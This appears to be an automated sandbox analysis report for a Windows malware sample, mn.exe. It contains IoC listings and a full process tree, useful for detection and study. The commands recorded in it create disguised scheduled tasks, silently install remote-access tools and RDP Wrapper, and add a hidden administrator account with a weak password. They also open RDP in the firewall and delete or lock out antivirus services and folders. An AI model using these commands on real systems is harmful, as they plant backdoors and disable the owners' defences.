a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a RDPWInst.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 mn.exe -
NTFS ADS 1 IoCs
Processes:
mn.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Local\Temp\WinMgmts:\ mn.exe -
Runs .reg file with regedit 2 IoCs
Processes:
regedit.exeregedit.exepid process 952 regedit.exe 1344 regedit.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
mn.exenetsh.exerutserv.exeicacls.exerutserv.exerfusclient.exewinit.exetaskhost.exetaskhost.exepid process 1856 mn.exe 1856 mn.exe 1856 mn.exe 1856 mn.exe 1856 mn.exe 1156 netsh.exe 1156 netsh.exe 1156 netsh.exe 1156 netsh.exe 1960 rutserv.exe 1960 rutserv.exe 304 icacls.exe 304 icacls.exe 240 rutserv.exe 240 rutserv.exe 240 rutserv.exe 240 rutserv.exe 1712 rfusclient.exe 1700 winit.exe 1700 winit.exe 1700 winit.exe 1700 winit.exe 1700 winit.exe 1700 winit.exe 1700 winit.exe 1700 winit.exe 1700 winit.exe 1700 winit.exe 1700 winit.exe 1700 winit.exe 1700 winit.exe 1700 winit.exe 1700 winit.exe 1700 winit.exe 1700 winit.exe 1700 winit.exe 1700 winit.exe 1700 winit.exe 1700 winit.exe 1700 winit.exe 1700 winit.exe 1700 winit.exe 1700 winit.exe 1700 winit.exe 1700 winit.exe 1700 winit.exe 1700 winit.exe 1700 winit.exe 1700 winit.exe 1700 winit.exe 1700 winit.exe 1700 winit.exe 1700 winit.exe 1568 taskhost.exe 1028 taskhost.exe 1028 taskhost.exe 1028 taskhost.exe 1028 taskhost.exe 1028 taskhost.exe 1028 taskhost.exe 1028 taskhost.exe 1028 taskhost.exe 1028 taskhost.exe 1028 taskhost.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
taskhostw.exetaskhost.exepid process 1136 taskhostw.exe 1028 taskhost.exe -
Suspicious behavior: LoadsDriver 5 IoCs
Processes:
pid process 472 2248 2248 2248 2248 -
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
rfusclient.exepid process 1708 rfusclient.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
Processes:
netsh.exeicacls.exerutserv.exetaskkill.exetaskkill.exeRDPWInst.exeMicrosoftHost.exedescription pid process Token: SeDebugPrivilege 1156 netsh.exe Token: SeDebugPrivilege 304 icacls.exe Token: SeTakeOwnershipPrivilege 240 rutserv.exe Token: SeTcbPrivilege 240 rutserv.exe Token: SeTcbPrivilege 240 rutserv.exe Token: SeDebugPrivilege 1824 Token: SeDebugPrivilege 2608 taskkill.exe Token: SeDebugPrivilege 3020 taskkill.exe Token: SeDebugPrivilege 3052 RDPWInst.exe Token: SeLockMemoryPrivilege 368 MicrosoftHost.exe Token: SeLockMemoryPrivilege 368 MicrosoftHost.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
netsh.exerutserv.exeicacls.exerutserv.exepid process 1156 netsh.exe 1960 rutserv.exe 304 icacls.exe 240 rutserv.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
mn.exewini.exeWScript.execmd.execmd.execmd.execheat.exedescription pid process target process PID 1856 wrote to memory of 1516 1856 mn.exe schtasks.exe PID 1856 wrote to memory of 1516 1856 mn.exe schtasks.exe PID 1856 wrote to memory of 1516 1856 mn.exe schtasks.exe PID 1856 wrote to memory of 1516 1856 mn.exe schtasks.exe PID 1856 wrote to memory of 1440 1856 mn.exe wini.exe PID 1856 wrote to memory of 1440 1856 mn.exe wini.exe PID 1856 wrote to memory of 1440 1856 mn.exe wini.exe PID 1856 wrote to memory of 1440 1856 mn.exe wini.exe PID 1440 wrote to memory of 568 1440 wini.exe WScript.exe PID 1440 wrote to memory of 568 1440 wini.exe WScript.exe PID 1440 wrote to memory of 568 1440 wini.exe WScript.exe PID 1440 wrote to memory of 568 1440 wini.exe WScript.exe PID 1440 wrote to memory of 1700 1440 wini.exe winit.exe PID 1440 wrote to memory of 1700 1440 wini.exe winit.exe PID 1440 wrote to memory of 1700 1440 wini.exe winit.exe PID 1440 wrote to memory of 1700 1440 wini.exe winit.exe PID 568 wrote to memory of 964 568 WScript.exe cmd.exe PID 568 wrote to memory of 964 568 WScript.exe cmd.exe PID 568 wrote to memory of 964 568 WScript.exe cmd.exe PID 568 wrote to memory of 964 568 WScript.exe cmd.exe PID 568 wrote to memory of 964 568 WScript.exe cmd.exe PID 568 wrote to memory of 964 568 WScript.exe cmd.exe PID 568 wrote to memory of 964 568 WScript.exe cmd.exe PID 964 wrote to memory of 952 964 cmd.exe regedit.exe PID 964 wrote to memory of 952 964 cmd.exe regedit.exe PID 964 wrote to memory of 952 964 cmd.exe regedit.exe PID 964 wrote to memory of 952 964 cmd.exe regedit.exe PID 964 wrote to memory of 1344 964 cmd.exe regedit.exe PID 964 wrote to memory of 1344 964 cmd.exe regedit.exe PID 964 wrote to memory of 1344 964 cmd.exe regedit.exe PID 964 wrote to memory of 1344 964 cmd.exe regedit.exe PID 964 wrote to memory of 1052 964 cmd.exe timeout.exe PID 964 wrote to memory of 1052 964 cmd.exe timeout.exe PID 964 wrote to memory of 1052 964 cmd.exe timeout.exe PID 964 wrote to memory of 1052 964 cmd.exe timeout.exe PID 1856 wrote to memory of 560 1856 mn.exe cheat.exe PID 1856 wrote to memory of 560 1856 mn.exe cheat.exe PID 1856 wrote to memory of 560 1856 mn.exe cheat.exe PID 1856 wrote to memory of 560 1856 mn.exe cheat.exe PID 1856 wrote to memory of 1008 1856 mn.exe cmd.exe PID 1856 wrote to memory of 1008 1856 mn.exe cmd.exe PID 1856 wrote to memory of 1008 1856 mn.exe cmd.exe PID 1856 wrote to memory of 1008 1856 mn.exe cmd.exe PID 1008 wrote to memory of 1340 1008 cmd.exe sc.exe PID 1008 wrote to memory of 1340 1008 cmd.exe sc.exe PID 1008 wrote to memory of 1340 1008 cmd.exe sc.exe PID 1008 wrote to memory of 1340 1008 cmd.exe sc.exe PID 1856 wrote to memory of 1048 1856 mn.exe cmd.exe PID 1856 wrote to memory of 1048 1856 mn.exe cmd.exe PID 1856 wrote to memory of 1048 1856 mn.exe cmd.exe PID 1856 wrote to memory of 1048 1856 mn.exe cmd.exe PID 1048 wrote to memory of 332 1048 cmd.exe sc.exe PID 1048 wrote to memory of 332 1048 cmd.exe sc.exe PID 1048 wrote to memory of 332 1048 cmd.exe sc.exe PID 1048 wrote to memory of 332 1048 cmd.exe sc.exe PID 1856 wrote to memory of 1576 1856 mn.exe cmd.exe PID 1856 wrote to memory of 1576 1856 mn.exe cmd.exe PID 1856 wrote to memory of 1576 1856 mn.exe cmd.exe PID 1856 wrote to memory of 1576 1856 mn.exe cmd.exe PID 964 wrote to memory of 1156 964 cmd.exe rutserv.exe PID 964 wrote to memory of 1156 964 cmd.exe rutserv.exe PID 964 wrote to memory of 1156 964 cmd.exe rutserv.exe PID 964 wrote to memory of 1156 964 cmd.exe rutserv.exe PID 560 wrote to memory of 1568 560 cheat.exe taskhost.exe -
Views/modifies file attributes 1 TTPs 5 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 1052 attrib.exe 800 attrib.exe 2676 attrib.exe 3036 attrib.exe 2996 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\mn.exe"C:\Users\Admin\AppData\Local\Temp\mn.exe"1⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Adds Run key to start application
- Modifies WinLogon
- Drops file in Program Files directory
- Modifies system certificate store
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 152⤵
- Creates scheduled task(s)
-
C:\ProgramData\Microsoft\Intel\wini.exeC:\ProgramData\Microsoft\Intel\wini.exe -pnaxui2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Programdata\Windows\install.bat" "4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg1.reg"5⤵
- Runs .reg file with regedit
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg2.reg"5⤵
- Runs .reg file with regedit
-
C:\Windows\SysWOW64\timeout.exetimeout 25⤵
- Delays execution with timeout.exe
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /silentinstall5⤵
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /firewall5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /start5⤵
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows\*.*5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\sc.exesc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/10005⤵
-
C:\Windows\SysWOW64\sc.exesc config RManService obj= LocalSystem type= interact type= own5⤵
-
C:\Windows\SysWOW64\sc.exesc config RManService DisplayName= "Microsoft Framework"5⤵
-
C:\ProgramData\Windows\winit.exe"C:\ProgramData\Windows\winit.exe"3⤵
- Executes dropped EXE
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Programdata\Install\del.bat4⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 55⤵
- Delays execution with timeout.exe
-
C:\programdata\install\cheat.exeC:\programdata\install\cheat.exe -pnaxui2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Microsoft\Intel\taskhost.exe"C:\ProgramData\Microsoft\Intel\taskhost.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: GetForegroundWindowSpam
-
C:\ProgramData\Microsoft\Intel\R8.exeC:\ProgramData\Microsoft\Intel\R8.exe4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"5⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\rdp\pause.bat" "6⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\timeout.exetimeout 37⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\chcp.comchcp 12517⤵
-
C:\rdp\Rar.exe"Rar.exe" e -p555 db.rar7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\timeout.exetimeout 27⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exetimeout 27⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"7⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\rdp\bat.bat" "8⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f9⤵
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f9⤵
-
C:\Windows\SysWOW64\netsh.exenetsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow9⤵
-
C:\Windows\SysWOW64\net.exenet.exe user "john" "12345" /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user "john" "12345" /add10⤵
-
C:\Windows\SysWOW64\chcp.comchcp 12519⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Администраторы" "John" /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" "John" /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Administratorzy" "John" /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administratorzy" "John" /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Administrators" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Administradores" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного управления" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Usuarios de escritorio remoto" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Uzytkownicy pulpitu zdalnego" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add10⤵
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -i -o9⤵
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow10⤵
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -w9⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f9⤵
-
C:\Windows\SysWOW64\net.exenet accounts /maxpwage:unlimited9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /maxpwage:unlimited10⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper\*.*"9⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper"9⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\rdp"9⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c C:\programdata\microsoft\temp\H.bat4⤵
- Drops file in Drivers directory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appidsvc2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exesc start appidsvc3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appmgmt2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exesc start appmgmt3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appidsvc start= auto2⤵
-
C:\Windows\SysWOW64\sc.exesc config appidsvc start= auto3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appmgmt start= auto2⤵
-
C:\Windows\SysWOW64\sc.exesc config appmgmt start= auto3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv2⤵
-
C:\Windows\SysWOW64\sc.exesc delete swprv3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop mbamservice2⤵
-
C:\Windows\SysWOW64\sc.exesc stop mbamservice3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop bytefenceservice2⤵
-
C:\Windows\SysWOW64\sc.exesc stop bytefenceservice3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete bytefenceservice2⤵
-
C:\Windows\SysWOW64\sc.exesc delete bytefenceservice3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete mbamservice2⤵
-
C:\Windows\SysWOW64\sc.exesc delete mbamservice3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete crmsvc2⤵
-
C:\Windows\SysWOW64\sc.exesc delete crmsvc3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state on3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny System:(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny Admin:(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)3⤵
- Executes dropped EXE
- Modifies file permissions
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
